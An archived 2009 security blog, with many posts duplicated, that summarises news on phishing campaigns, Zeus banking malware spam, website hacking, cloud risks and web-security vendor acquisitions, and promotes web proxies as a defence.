While these scams and the money aspect isn't new news, it's a good reminder why we have proxies in place to secure our access to the internet from our organizations. The article also provides some good reminders:
The team says, “Although ‘classic’ techniques are relatively well-known, cyber criminals are becoming cleverer. Users need to be educated to stop clicking on links in emails from unknown senders. If it is sent from a friend or colleague, it should be double-checked with the sender. Users should always be suspicious of any site with an unknown domain that contains the name of a well-known site in the latter part of the web address.”
The biggest threat now facing users may no longer be phishing—or accessing passwords. At least three quarters of malicious content is contained in legitimate sites. ... Almost 70 per cent of the top 100 most popular websites either hosted malicious content or contained a ‘masked redirect’ to lure unsuspecting victims from legitimate sites to malicious sites.
“In essence, the only way to be secure against the threat landscape is to ensure that a powerful security solution is in place which can provide real-time protection,” the UK team said. It is still a cops and robbers game. And there are too many robbers out there.
We've talked in the past here about real-time protection on your proxy. Since user education can only go so far, making sure your proxy has the capability to do real-time rating is more important than ever coupled with malware scanning capability.
Wednesday, November 18, 2009
Top 10 issues overloading IT managers
It only gets an honorable mention but Web management was talked about on this recent list of top 10 issues that are overloading IT managers.  Web management refers to watching what employees are doing on the internet.  It is one of those tasks that IT managers are increasingly being called on to do, but a job that most dislike doing.
IT Managers are increasingly overloaded these days and the common view is that they have more than enough on their plate without playing censor to an entire company. Yes, if someone's spending all their time looking at porn on the internet that's an issue for a company, but the prevailing view is that it's a problem in management, not in IT.
The only time the IT department should get involved is after a complaint, either from someone on the floor who's spotted what's going on or from a manager who's concerned about lost productivity.
As the article says:
There's definitely a need for tools like proxies to help in this new/old IT task.
IT Managers are increasingly overloaded these days and the common view is that they have more than enough on their plate without playing censor to an entire company. Yes, if someone's spending all their time looking at porn on the internet that's an issue for a company, but the prevailing view is that it's a problem in management, not in IT.
The only time the IT department should get involved is after a complaint, either from someone on the floor who's spotted what's going on or from a manager who's concerned about lost productivity.
As the article says:
The tasks of monitoring and managing web access has only become more difficult as interest in new web services has grown. Now, sites such as Twitter and Facebook aren't purely for consumers, and many companies also make use of them for promotion and customer relations.
This means that simply blocking everyone from these services is no longer possible, as they have become work tools.
At the same time, more and more new sites are popping up, more blogging platforms, social networks and casual gaming portals are emerging every day, making it far more difficult to keep up with what can and can't be blocked.
Then, on top of it all, there are the ever-growing ranks of malware infections and phishing scams connected to web applications and tools, making the risk of security breaches through the browser stronger than ever.
As such, the task of web management at the corporate level is becoming more complex and crucial at a most inopportune time.
There's definitely a need for tools like proxies to help in this new/old IT task.
Tuesday, November 17, 2009
Are companies blocking more social networking site?
There's a lot more articles and discussion about social networking lately, and it's prevalence and use in the workplace.  A couple of years ago it would have been easy to say that social networking, such as Facebook, MySpace and Twitter had no place in the workplace, the decision was easy for IT administrators to block access to these sites from the corporate network.
The Guardian, last week, has even said that after-work life is rapidly disappearing and being replaced by non-working life. Because of this there's a belief that the transparency regarding people’s private lives because of new media such as Twitter and Facebook will make employers more tolerant of social networking — or make employees better behaved on these sites.
“The business use case in Twitter is turning out to be very important,” Twitter co-founder Biz Stone said last week as the company announced the possibility of cross-posting tweets to the professional network LinkedIn.
But you should still be concerned about crossing the line between business and personal use of social networking. For example, you'll probably want to think twice about tweeting that you hate your new job but are grateful for the fat pay check.
While some companies still allow social networking use in the workplace, a recent analysis of more than a billion Web requests processed by ScanSafe each month showed a 20 per cent increase in the number of customers blocking social networking sites in the last six months.
Currently, 76 per cent of companies are choosing to block social networking and it is now a more popular category to block than online shopping (52 per cent), weapons (75 per cent), alcohol (64 per cent), sports (51 per cent) and Web mail (58 per cent).
Blocking social networking is still an option for any IT administrator, or at least tracking who uses it. But it's definitely something that's going to remain in the news for some time to come.
The Guardian, last week, has even said that after-work life is rapidly disappearing and being replaced by non-working life. Because of this there's a belief that the transparency regarding people’s private lives because of new media such as Twitter and Facebook will make employers more tolerant of social networking — or make employees better behaved on these sites.
“The business use case in Twitter is turning out to be very important,” Twitter co-founder Biz Stone said last week as the company announced the possibility of cross-posting tweets to the professional network LinkedIn.
But you should still be concerned about crossing the line between business and personal use of social networking. For example, you'll probably want to think twice about tweeting that you hate your new job but are grateful for the fat pay check.
While some companies still allow social networking use in the workplace, a recent analysis of more than a billion Web requests processed by ScanSafe each month showed a 20 per cent increase in the number of customers blocking social networking sites in the last six months.
Currently, 76 per cent of companies are choosing to block social networking and it is now a more popular category to block than online shopping (52 per cent), weapons (75 per cent), alcohol (64 per cent), sports (51 per cent) and Web mail (58 per cent).
Blocking social networking is still an option for any IT administrator, or at least tracking who uses it. But it's definitely something that's going to remain in the news for some time to come.
Monday, November 16, 2009
Spam targets financial transfers
In news showing more links between bad webpages and spam, and definitely news in the fight against malware, viruses and hackers, the latest is that there's a new spam attack that targets a financial transfer system handling trillions of dollars in transactions annually. What's not surprising is that it turns out it's yet another case of fake emails.
The spam messages pretend to come from the National Automated Clearing House Association (NACHA), a U.S. nonprofit association that oversees the Automated Clearing House system (ACH). ACH is a widely used by system used by financial institutions for exchanging details of direct deposits, checks and cash transfers.
It appears that in the last few months, numerous businesses have lost money through ACH fraud. It happens when the hackers obtain the authentication credentials required to transfer money. Although NACHA has no direct involvement in the processing of the payments, spammers have launched a campaign with messages purporting to be from the organization saying that an ACH payment has been rejected.
The spam messages have a link to a fake website that looks like NACHA's. The site asks the victim to download a PDF file, but it is actually an executable. If launched, the file will install Zbot, also known as Zeus, an advanced piece of banking malware that can harvest the authentication details required to initiate an ACH transaction.
NACHA has put an advisory on its website, warning: "NACHA does not send communications to individuals or organizations about individual ACH transactions that they originate or receive."
With this kind of sophisticated trickery, the question becomes: How do you stop it? For starters, make sure you publicize the scheme and keep ACH clients well-trained to refuse emails even if they look real. And of course, make sure your proxy system is up to date with the latest anti-malware, URL database and real-time rating system.
The spam messages pretend to come from the National Automated Clearing House Association (NACHA), a U.S. nonprofit association that oversees the Automated Clearing House system (ACH). ACH is a widely used by system used by financial institutions for exchanging details of direct deposits, checks and cash transfers.
It appears that in the last few months, numerous businesses have lost money through ACH fraud. It happens when the hackers obtain the authentication credentials required to transfer money. Although NACHA has no direct involvement in the processing of the payments, spammers have launched a campaign with messages purporting to be from the organization saying that an ACH payment has been rejected.
The spam messages have a link to a fake website that looks like NACHA's. The site asks the victim to download a PDF file, but it is actually an executable. If launched, the file will install Zbot, also known as Zeus, an advanced piece of banking malware that can harvest the authentication details required to initiate an ACH transaction.
NACHA has put an advisory on its website, warning: "NACHA does not send communications to individuals or organizations about individual ACH transactions that they originate or receive."
With this kind of sophisticated trickery, the question becomes: How do you stop it? For starters, make sure you publicize the scheme and keep ACH clients well-trained to refuse emails even if they look real. And of course, make sure your proxy system is up to date with the latest anti-malware, URL database and real-time rating system.
Friday, November 13, 2009
M86 E-Mail Security Program Blocks Messages with Malicious URLs
Security vendor M86 has enhanced its e-mail gateway security program. MailMarshal SMTP version 6.7 includes a blended threat module that blocks e-mails containing malicious URL links and uses a cloud-based malware behavior analysis service for rapid identification of new malicious links. The analysis service is actually an "interaction," as the company calls it, with the behavioral malware detection technology from Avinti, acquired by M86 earlier this year.
The new release also includes IP Reputation Service, which blocks incoming spam based on the sending IP address reputation to dramatically decrease bandwidth previously consumed by spam, and SpamBotCensor, which identifies and blocks bot-based spam.
"Blended threats are the most prominent malicious e-mail security threat to organizations today," said William Kilmer, chief marketing officer and former CEO of Avinti. "In fact, according to recent research from M86 Security Labs, blended e-mail threats have spiked to exceed 30 percent of all spam, about one in every three messages.
It's just another recognition that the threat vector is increasingly moving from email to the web. While email security remains important, the payload from viruses and malware is increasingly coming from web sources, making the proxy one of the most important tools in a security arsenal any organization should have.
The new release also includes IP Reputation Service, which blocks incoming spam based on the sending IP address reputation to dramatically decrease bandwidth previously consumed by spam, and SpamBotCensor, which identifies and blocks bot-based spam.
"Blended threats are the most prominent malicious e-mail security threat to organizations today," said William Kilmer, chief marketing officer and former CEO of Avinti. "In fact, according to recent research from M86 Security Labs, blended e-mail threats have spiked to exceed 30 percent of all spam, about one in every three messages.
It's just another recognition that the threat vector is increasingly moving from email to the web. While email security remains important, the payload from viruses and malware is increasingly coming from web sources, making the proxy one of the most important tools in a security arsenal any organization should have.
Wednesday, November 11, 2009
War beneath the web
A new article in the Guardian talks about the state of website hacking.  Hacking websites used to be a way to show off. Now, it's a lucrative crime – committed on an industrial scale.
You can read the entire article here.
And here are some highlights from the article:
Sounds scary, but shouldn't be any new news for a savvy IT administrator. All these points just reiterate the need for a proxy acting as web security gateway in your network.
You can read the entire article here.
And here are some highlights from the article:
Experts agree that the change is due to one critical factor: money. Hackers generally don't now aim to make a mess; they do it to get cash.
"The difference is that in about 2003 people realised they could use these weaknesses to make money," explains Richard Clayton, a security researcher at Cambridge University. "There are three ways they do it: drive-by downloads, which enlarge a botnet [which can be hired to send spam, assist in the theft of personal details, or attack websites to extort their owners]; hosting a phishing site, so they can collect login details; and putting spam links on the site to raise the spam's search engine ranking." The hacking of Free Our Data and the other sites had the latter purpose.
...
Clayton and his team have done extensive research into phishing sites hosted on cracked web servers. "We found the same sites would get hacked. Our insight was that people were using Google to find websites to break into, by doing specific searches for particular versions of software that they knew had particular vulnerabilities – Wordpress 1.3.1 or Drupal or whatever. So they'd do a Google search, find those sites and then hack all 50 sites using the same method."
...
"It's a big problem and getting worse," says Dave Jevans, chief executive of IronKey and chair of the Anti-Phishing Working Group. "When I have tracked website attacks, I've found it convenient to look at the Zone-H statistics. Zone-H.org reports on website breach defacements, as reported by bragging hackers. The exact same attack methodologies are used to make a website host malware or a phishing site.
"Today they reported 1,110 defacements so far. For the month of October 2009 they reported 47,560. So that's about half a million defaced websites per year. Now keep in mind that this is reporting by hackers themselves. Imagine the number of sites that are attacked and breached that are not reported to Zone-H."
Sounds scary, but shouldn't be any new news for a savvy IT administrator. All these points just reiterate the need for a proxy acting as web security gateway in your network.
Tuesday, November 10, 2009
Rogue Anti-Spyware Targets Sesame Street's Big Bird
Most of you have seen by now that Google's search engine page features Sesame Street characters to honor the 40th anniversary of Sesame Street.  Google follows the news and trends of the world and honors significant events in its logo.  
Unfortunately, the idea of malware distributors abusing Google Trends is not new. The bad guys have once again demonstrated that they, too, can take advantage of Google Trends. This time their target is Sesame Street's birthday.
With the fortieth anniversary of Sesame Street, the bad guys have begun their attack. Searching for keywords such as Big Bird's birthday and Big Bird on Google displays pages with compromised sites.
More with video clip in
Unfortunately, the idea of malware distributors abusing Google Trends is not new. The bad guys have once again demonstrated that they, too, can take advantage of Google Trends. This time their target is Sesame Street's birthday.
With the fortieth anniversary of Sesame Street, the bad guys have begun their attack. Searching for keywords such as Big Bird's birthday and Big Bird on Google displays pages with compromised sites.
More with video clip in
http://www.avertlabs.com/research/blog/index.php/2009/11/09/rogue-anti-spyware-targets-sesame-streets-big-bird/
Monday, November 9, 2009
Targeted attacks possible in the cloud, researchers warn
Network World reported last week, that the use of virtualization by cloud service providers using virtual systems on servers shared by multiple customers is opening up fresh data leak risks.
The article is based on a report by four researchers at MIT and the University of California at San Diego showing how vulnerabilities in cloud infrastructures could allow attackers to locate and eavesdrop on targeted virtual machines (VMs) anywhere in the cloud.
From the article:
This may be one more reason to reconsider that move to the cloud, or at least wait until better security can be devised for the cloud.
The article is based on a report by four researchers at MIT and the University of California at San Diego showing how vulnerabilities in cloud infrastructures could allow attackers to locate and eavesdrop on targeted virtual machines (VMs) anywhere in the cloud.
From the article:
The attack described in the report was conducted against Amazon's Elastic Computer Cloud (EC2) service. But the vulnerabilities that enable it are generic and would likely affect other cloud providers, said Eran Tromer, a post-doctoral researcher at MIT's Computer Science and Artificial Intelligence Laboratory and one of the authors of the report. The report is scheduled to be presented at the Association for Computing Machinery (ACM) Conference on Computer and Communications Security next month.
The research raises questions about a fundamental assumption about cloud computing which says that data hosted in a cloud is relatively safe from targeted attacks because it's hard to know where in the cloud the data is located. The research also comes at a time when concerns are high about security and privacy issues related to cloud computing.
This may be one more reason to reconsider that move to the cloud, or at least wait until better security can be devised for the cloud.
Thursday, November 5, 2009
Blue Coat Acquires S7
On Thursday, the company said it would acquire S7 Software, a services company based in Bangalore. Blue Coat is paying US$5.25 million in cash for the 65-person company.
S7 specializes in migrating applications from one platform to another. Blue Coat sells network security and performance monitoring appliances, but it is buying S7 because of the company's software development expertise.
Blue Coat also announced it is restructuring its business, and Blue Coat will shift an undisclosed number of engineering jobs from its Sunnyvale, California, and Austin, Texas, offices to S7's offices in Bangalore and other locations. With new hires and S7 additions, the company's total headcount reduction as part of the restructuring will be around 10 percent.
S7 specializes in migrating applications from one platform to another. Blue Coat sells network security and performance monitoring appliances, but it is buying S7 because of the company's software development expertise.
Blue Coat also announced it is restructuring its business, and Blue Coat will shift an undisclosed number of engineering jobs from its Sunnyvale, California, and Austin, Texas, offices to S7's offices in Bangalore and other locations. With new hires and S7 additions, the company's total headcount reduction as part of the restructuring will be around 10 percent.
Wednesday, November 4, 2009
Welcome to Application Delivery 2.0
Network World, last week published an article declaring that many IT organizations are entering a new era of application deliver – one that they refer to as Application Delivery 2.0.  The challenges of the Application Delivery 2.0 era will be notably more complex and challenging than are those of the current one.
First the background:
While Network World seems to think we're entering a new era of Application Delivery, these issues seems to be the same ones we've already faced for some time now. Mobile workers doesn't sound like a new phenomenon to me, but maybe I'm missing something.
First the background:
While ensuring acceptable application delivery has always been important, it historically was not a top of mind issue for most IT organizations. That changed a few years ago when IT organizations began to focus on ensuring acceptable application delivery. They did this by deploying a first generation of solutions that were intended to mitigate the impact of chatty protocols such as CIFS (Common Internet File System), to offload computationally intensive processing (for example TCP termination and multiplexing) off of servers, and to provide visibility into the performance of applications. Unfortunately, the IT organization of a few years ago typically approached application delivery from a tactical, stove-piped approach.
Hence, we are hesitant to use the phrase Application Delivery 2.0 as it sounds so much like just one more marketing cliché. However, we see distinct evidence, both from vendors and from IT organizations that we are indeed entering a second generation of application delivery.
Part of the characterization of Application Delivery 2.0 is that IT organizations are beginning to face a new set of challenges. That does not mean that the traditional challenges of supporting chatty protocols or maximizing the performance of servers have gone away. As is so often the case in our industry, IT organizations have to support traditional or legacy technologies and challenges at the same time that they have to respond to new technologies and challenges.
One of the new challenges facing IT organizations stems from the changing role of the mobile worker. A few years ago, there were relatively few mobile workers and the communications needs of the mobile workers of that era were satisfied with simple cell phones. That is no longer the case. Now it is common to have 25% or more of employees be mobile at any point in time. These employees have smartphones or other wireless devices that they routinely use to access business-critical applications. This introduces all of the performance and security issues associated with wireless networking into the mix of application delivery challenges.
While Network World seems to think we're entering a new era of Application Delivery, these issues seems to be the same ones we've already faced for some time now. Mobile workers doesn't sound like a new phenomenon to me, but maybe I'm missing something.
Tuesday, November 3, 2009
M86 Buys Finjan Security
M86 (formerly Marshal8e6 - the merger of Marshal and 8e6 Technologies) announced today the acquisition of Finjan Security, a web and email security vendor.  This latest deal confirms that the security industry consolidation continues.
Finjan brings to the table a secure Web gateway product and software-as-a-service solutions, M86 said in a statement. Under the merger, which is effective immediately, Finjan will maintain a development center and operations in Netanya, Israel.
The U.S.-based Finjan SW will remain an independent company to retain its malware detection intellectual property, according to a statement.
M86 was created a year ago with the merger of Marshal and 8e6. In March 2009, the combined company acquired behavioral malware detection company Avinti.
Last week, Cisco Systems said it was buying Web-based security software company ScanSafe. And earlier in October, Barracuda Networks, which makes security appliances, announced its purchase of Purewire, a Web security-as-a-service provider.
Meanwhile, vulnerability management provider Rapid7 recently acquired Metasploit, an open-source penetration testing framework and exploit database.
Finjan brings to the table a secure Web gateway product and software-as-a-service solutions, M86 said in a statement. Under the merger, which is effective immediately, Finjan will maintain a development center and operations in Netanya, Israel.
The U.S.-based Finjan SW will remain an independent company to retain its malware detection intellectual property, according to a statement.
M86 was created a year ago with the merger of Marshal and 8e6. In March 2009, the combined company acquired behavioral malware detection company Avinti.
Last week, Cisco Systems said it was buying Web-based security software company ScanSafe. And earlier in October, Barracuda Networks, which makes security appliances, announced its purchase of Purewire, a Web security-as-a-service provider.
Meanwhile, vulnerability management provider Rapid7 recently acquired Metasploit, an open-source penetration testing framework and exploit database.
Friday, October 30, 2009
The Curse of Cloud Security
Lately, there's been a lot of talk around the new buzz words, "cloud computing".  We've even discussed the issue here on this blog in past articles.  The immediate benefits of cloud computing are obvious by letting you simplify your physical IT infrastructure and cut overhead costs.  But the problem that seems to keep haunting us is we've only started to see the all of security risks involved. 
Network World tackles this topic this week and says:
The article is a good reminder to make sure we have all of our ducks in a row if you're going to consider cloud computing. Network World asks the difficult question:
Network World tackles this topic this week and says:
Putting more of your infrastructure in the cloud has left you vulnerable to hackers who have redoubled efforts to launch denial-of-service attacks against the likes of Google, Yahoo and other Internet-based service providers. A massive Google outage earlier this year illustrates the kind of disruptions cloud-dependent businesses can suffer.
That's one of the big takeaways from the seventh-annual Global Information Security survey, which CSO and CIO magazines conducted with PricewaterhouseCoopers earlier this year. Some 7,200 business and technology executives worldwide responded from a variety of industries, including government, health care, financial services and retail.
Given the expense to maintain a physical IT infrastructure, the thought of replacing server rooms and haphazardly configured appliances with cloud services is simply too hard for many companies to resist. But rushing into the cloud without a security strategy is a recipe for risk. According to the survey, 43 percent of respondents are using cloud services such as software as a service or infrastructure as a service. Even more are investing in the virtualization technology that helps to enable cloud computing. Sixty-seven percent of respondents say they now use server, storage and other forms of IT asset virtualization. Among them, 48 percent actually believe their information security has improved, while 42 percent say their security is at about the same level. Only 10 percent say virtualization has created more security holes.
Security may well have improved for some, but experts like Chris Hoff, director of cloud and virtualization solutions at Cisco Systems, believe that both consumers and providers need to ensure they understand the risks associated with the technical, operational and organizational changes these technologies bring to bear.
The article is a good reminder to make sure we have all of our ducks in a row if you're going to consider cloud computing. Network World asks the difficult question:
When it went down, many companies that have come to rely on its cloud-based business applications (such as e-mail) were dead in the water. ...
"What if you have a breach and you need to leave the cloud? Can you get out if you have to?"
Thursday, October 29, 2009
Cyber Security Awareness
The Open Systems Journal web site is highlighting Cyber Security Awareness this month, and Day 25 of their efforts focused on security through port 80 and 443, the ones used for web traffic.
As they remind us:
Any serious IT admin concerned about security, should already have the aforementioned proxy in their network. It provides a way to make sure only true http traffic is passed through these ports (you can choose to block anything that's not actually http). And even if you don't do this (you'd be surprised how many applications you break if you do), at least you'll have a record of all the traffic going through port 80 and 443, for later audits. But seriously consider controlling more of the traffic through port 80 and 443. The proxy will definitely help you do this.
As they remind us:
Port 80 and 443 are ports generally associated with the Internet. Port 443/HTTPS is the HTTP protocol over TLS/SSL. Port 80/HTTP is the World Wide Web. Let’s face it, port 80/443 are generally a given for being open on any type of filtering device allowing traffic outbound on your network. If web servers are being hosted, connections will be allowed inbound to those web servers. They are also two ports that pose a significant threat(s) to your network.
One reason for such a threat, is the very fact that we just mentioned: everyone generally associates it with the Internet and web traffic and its usually open. Sadly, it doesn’t get watched that closely. I have heard the statement many times its just people surfing the web and we ignore it cause there is too much traffic. The sad reality is that more often than not, the threat will come from people on your network surfing the web. The rise in browser based attacks is staggering to say the least.
For those that do want to watch it close, that poses a challenge as well. How do you filter? What do you filter? How do you do analysis on the traffic? Let me pose a example to you. I looked at a piece of malware about three years ago that used base64 encoded html comments, on a very benign web page, to pass commands. How do you detect that? Some software automatically defaults to port 80 if the primary port is available.
The above two threats applies to port 80 and 443 traffic. Now, let’s just focus on 443 for a minute. It’s encrypted traffic which means you can’t read it. So what do you do? Unless you have a proxy on your network where you can inspect the traffic at that point or run a host based IDS etc., your other network tools are blind to what is there.
Any serious IT admin concerned about security, should already have the aforementioned proxy in their network. It provides a way to make sure only true http traffic is passed through these ports (you can choose to block anything that's not actually http). And even if you don't do this (you'd be surprised how many applications you break if you do), at least you'll have a record of all the traffic going through port 80 and 443, for later audits. But seriously consider controlling more of the traffic through port 80 and 443. The proxy will definitely help you do this.
Wednesday, October 28, 2009
Cookies sound sweet, but they can be risky
USA TODAY ran a story this week with the above title.  Catchy for the typical reader, but has so much more meaning when you're an IT manager.  For the uninitiated, everywhere you go on the Internet, you leave behind small footprints called cookies.
From the USA Today article:
USA Today does offer some advice to protect yourself when browsing the web:
Of course that last recommendation is one I heartily endorse. Anyone managing a network should consider putting a proxy server to help protect the end-users browsing the web. In addition make sure that proxy server is up to date on its URL database, real time categorization, and malware scanning software.
From the USA Today article:
Cookies track where you have gone online and are stored on your hard drive. The websites you visit tap into those cookies so they can tailor promotions to you or retrieve data such as your credit card information. Every site you visit also registers your numerical IP (Internet protocol) address and can track information associated with it. Your IP address contains information like your hometown, but not your name.
Cookies come in two types: first- and third-party. First-party cookies are kept only by the site you visit and any affiliated properties, such as the company's Facebook fan page. This information is not shared with other websites and is generally not considered worrisome. Third-party cookies are those shared across various websites; for example, if you click on certain ads or search for a car on sites that share such cookies, your information goes to a far larger audience.
USA Today does offer some advice to protect yourself when browsing the web:
•Check website privacy policies. Most sites state what information is gathered and how it is used. Some will let you opt in or opt out of the collection process. Check the policy especially if you plan to register on a site.
•Disable cookies. Onyour Web browser, you likely have an option to disable all cookies or those that apply to third-party uses. Disabling first-party cookies means websites won't likely have your credit card or password information stored anymore. Greve has disabled third-party cookies on her computer and "sleeps better at night" because of it, she says.
•Remove cookies regularly. You can set your browser to automatically clear your entire browsing history and cookies, or do it manually. But Greve says even though cookies are removed from the computer, "Once you put your information out, it's out there, and it's going to get to stores in one way, shape or form."
•Consider installing an "anonymizer." These services hide your IP address wherever you go, but Greve warns there have been "phishing" attacks — e-mails that try to get personal information — through some of these.
•Use a proxy server. These devices, which are intermediaries between networks, allow you to browse in private.
Of course that last recommendation is one I heartily endorse. Anyone managing a network should consider putting a proxy server to help protect the end-users browsing the web. In addition make sure that proxy server is up to date on its URL database, real time categorization, and malware scanning software.
Tuesday, October 27, 2009
Cisco to Acquire SaaS Web Security Leader ScanSafe
This morning, Cisco announced its intention to purchase ScanSafe, a provider of SaaS Web Security.  It's another announcement in a string of acquisitions in the web security space, the most recent was Barracuda's announcement of their intention to purchase PureWire, another SaaS Web Security provider.
ScanSafe is based in London and San Francisco, and its Web security solutions are targeted at organizations ranging from global enterprises to small businesses.
From the announcement:
There's definitely more interest lately in Web Security, and I think you'll only see more in the acquisition arena, in addition to new offerings from various vendors. With malware being as prevalent in web pages as in email, this trend can only continue.
ScanSafe is based in London and San Francisco, and its Web security solutions are targeted at organizations ranging from global enterprises to small businesses.
From the announcement:
"With the acquisition of ScanSafe, Cisco is executing on our vision to build a borderless network security architecture that combines network and cloud-based services for advanced security enforcement," said Tom Gillis, vice president and general manager of Cisco's Security Technology Business Unit (STBU). "Cisco will provide customers the flexibility to choose the deployment model that best suits their organization and deliver anytime, anywhere protection against Web-based threats."
Web security is a large and expanding market expected to grow to $2.3 billion by 2012. By acquiring ScanSafe, Cisco is building on its successful acquisition of leading on-premise content security provider IronPort. The acquisition brings together the Cisco IronPort(TM) high-performance Web security appliance and ScanSafe's leading SaaS Web security service. This combination will expand Cisco's security portfolio to offer superior on-premise, hosted, and hybrid-hosted Web security solutions.
"ScanSafe pioneered the market for SaaS Web security and continues as a leader in this rapidly growing market," said ScanSafe CEO Eldar Tuvey. "At a time when enterprises are increasingly focused on a flexible and mobile workplace, the need for hybrid-hosted Web security solutions is greater than ever. By joining the Cisco team we will be able to offer even better and more flexible protection to our customers."
ScanSafe's service will be integrated with Cisco® AnyConnect VPN Client, the newest virtual private network (VPN) product from Cisco, to provide the industry's leading secure mobility solution. In addition, ScanSafe's global network of carrier-grade data centers and multi-tenant architecture will further enhance Cisco's ability to provide new cloud-security services for customers anywhere in the world.
Upon the close of the acquisition, the ScanSafe team will become part of Cisco's STBU, reporting to Gillis.
The ScanSafe acquisition demonstrates Cisco's commitment to security and its ability to use its financial strength to quickly capture key market transitions through its build, buy, and partner strategy. Under the terms of the agreement, Cisco will pay approximately $183 million in cash and retention-based incentives. The acquisition is subject to various standard closing conditions and is expected to close in the second quarter of Cisco's fiscal year 2010.
There's definitely more interest lately in Web Security, and I think you'll only see more in the acquisition arena, in addition to new offerings from various vendors. With malware being as prevalent in web pages as in email, this trend can only continue.
One Phishing Gang Dominates Attacks
Both PC World and Network World reported this week on a report released by the Anti-Phishing Working Group (APWG).  According to the APWG, a single group of attackers accounted for a quarter of all phishing in the first half of this year.
The group goes by the name Avalanche, and started work late last year and has been increasing its activity since. "This criminal operation is one of the most sophisticated and damaging on the Internet and targets vulnerable or non-responsive registrars and registries," the APWG report says.
From the PC World article:
This new report from the APWG, reminds us to make sure we've got some sort of protection against phishing sites in our proxy deployment. The short-lived nature of these domains, also makes it important to not rely solely on URL databases, but also some type of real time categorization.
The group goes by the name Avalanche, and started work late last year and has been increasing its activity since. "This criminal operation is one of the most sophisticated and damaging on the Internet and targets vulnerable or non-responsive registrars and registries," the APWG report says.
From the PC World article:
The group attacks financial institutions, online services and job-search providers using fast-flux techniques that hide its actual attack sites behind an ever-changing group of proxy machines, mainly hacked consumer computers, according to APWG's latest Global Phishing Survey.
Rather than dying out after efforts to take down the Avalanche efforts, the gang seems to be increasing its efforts. "Avalanche attacks increased significantly in the third quarter of the year, and preliminary numbers indicate a possible doubling of attacks in the summer of 2009," the report says. The report period ends July 1, so the next report for the second half of this year will examine the apparent surge in detail.
Because the IP addresses that the attacks seem to be coming from are constantly shifting, notifying ISPs of the problem doesn't work. By the time the ISPs shut down the IP addresses the attack proxies have moved somewhere else, the report says.
The Avalanche gang registers domains at one to three registries or resellers and test whether the registrars notice that they are registering domain names that are nearly identical. If not, they launch attacks from these domains, and if the registrar takes action against them, they just abandon the domains and move on.
An example of these similar domains is given in the report: 11fjfhi.com, 11fjhj.com, 11fjfh1.com, 11 fjfhl.com. Each domain is used to launch up to 30 attacks, APWG says.
Avalanche attacks just one or two businesses at a time and frequently cycles back to re-attack older targets, the report says.
Because mitigation efforts by ISPs and others focused on Avalanche, the average lifetime of each Avalanche attack was significantly lower than the average for all attacks, the report says. The average uptime for all attacks was 39 hours, 11 minutes; for Avalanche attacks, it was 18 hours, 45 minutes, the study says.
APWG researchers consider an attack dead if it stays inactive for an hour. These attacks could be started up again after an hour, which would extend their longevity but would not be measured by the report, the researchers say. So the lifespan of Avalanche attacks may be longer than the report results indicate.
Malicious Domains Increase
In other study results, it appears that using hacked domains as launch pads for attacks is increasing. Some 14.5% of phishing attacks came from what APWG called malicious domains registered by phishers themselves. That is down from 18.5% in the second half of last year, the period for the group's previous Global Phishing Survey. "Virtually all the rest were hacked or "compromised" domains belonging to innocent site owners," the study says.
Of the malicious domains, 43% were launchpads for the Avalanche attack.
Two top level domains - .pe (Peru) and .th (Thailand) – score highest in a measure of how many second and third level domains within them are used to launch phishing attacks. The average score across all domains was 6.9, and .pe scored 20 while .th scored 16.
Overall, attacks came from 30,131 domains distributed among 171 top level domains. Half (50.3%) of these domains fell within the .com top level domain, 8.5% within .net and 5.6 within .org. The next three most often used top level domains were .eu, .ru and .de, all with less than 3%.
This new report from the APWG, reminds us to make sure we've got some sort of protection against phishing sites in our proxy deployment. The short-lived nature of these domains, also makes it important to not rely solely on URL databases, but also some type of real time categorization.
Monday, October 26, 2009
Geocities set to close today
It's a sad day for many of us who've been around on the Internet for a long time.  Geocities is set to close today.  Started in 1994, it was the place for the masses to have their own website.  I remember getting my own page and email address at geocities in 1995.  I was lucky and early enough to get a short email address with just my name at the time.  
Somehow, Yahoo never figured out how to make any money from Geocities, even though the network is still among the top 200 most-trafficked sites on the Internet, according to metrics tracker Alexa. That alone should have given Yahoo some reason to keep the site and try and revive it's usage, at least for ad content revenue.
But alas, that's not the case. But for those of you still looking for Geocities content, you may be relieved some it will be saved at the Archive Team, where they've been busily rushing to save pages, before today's deadline.
Somehow, Yahoo never figured out how to make any money from Geocities, even though the network is still among the top 200 most-trafficked sites on the Internet, according to metrics tracker Alexa. That alone should have given Yahoo some reason to keep the site and try and revive it's usage, at least for ad content revenue.
But alas, that's not the case. But for those of you still looking for Geocities content, you may be relieved some it will be saved at the Archive Team, where they've been busily rushing to save pages, before today's deadline.
Friday, October 23, 2009
Schwarzenegger denies consumers knowledge of their own stolen data
I might have missed this bit of news if it hadn't been for a blog over at Sophos, the anti-virus provider.  Apparently last week, California Governor Arnold Schwarzenegger vetoed senate bill SB-20. The bill would have required businesses to inform consumers of what data about them was lost during a breach, inform the California Attorney General if more than 500 records were lost and provide advice to consumers on how to protect themselves from their data being exploited. It was passed by both the California Legislature and Senate without opposition.
More from Chester Wiesniewski's blog:
I agree with Mr. Wiesniewski, this should have been something the Governor signed, and I also agree it's surprising that Governor vetoed this. With the widespread identity theft in the world today, you'd think this one would have been a no-brainer.
More from Chester Wiesniewski's blog:
The authors of the bill had worked closely with the insurance industry and other related parties to strike the right balance between protecting consumers and not placing an undue burden on businesses. Arnold disagrees, and claims to be looking out for businesses, yet those businesses had already dropped opposition to the legislation.
The Governator and I clearly don't see eye to eye on this one. I had my debit card "skimmed" a year ago from a local Automatic Teller Machine (ATM) in Vancouver. My bank dutifully notified me and asked me to come in for a replacement card. While speaking with the clerk at my local branch to retrieve my new card, I asked "Which ATM was it where my card was compromised, or was it a shop?" The response was "We don't disclose those details to customers."
Why not? I certainly do not want to make the mistake of returning to a merchant who may have been in on the scam. Consumers who are made aware of data loss have a right to know what personal information may have been obtained about them so they can protect themselves in the future.
I agree with Mr. Wiesniewski, this should have been something the Governor signed, and I also agree it's surprising that Governor vetoed this. With the widespread identity theft in the world today, you'd think this one would have been a no-brainer.
Thursday, October 22, 2009
Using Reverse Proxies for Front Ending Exchange
The Microsoft Exchange Team Blog wrote this week on the topic of Exchange 2010 (and 2007) Client Access Servers in the perimeter network, similar to the way "FE" (front end) servers are placed for Exchange 2000/2003.  Their recommendation?  Don't do it.
Instead the recommendation is to use reverse proxies. Their explanation:
If Microsoft recommended FE servers to be in the perimeter network for 2000/2003, what are the other reasons they've changed their stance for Exchange 2007 and 2010? Here's some of the more detailed rationale:
It looks like Microsoft is coming around to what we've known here all along, which is the proxy is still the best solution for securing web traffic coming into and out of the organization.
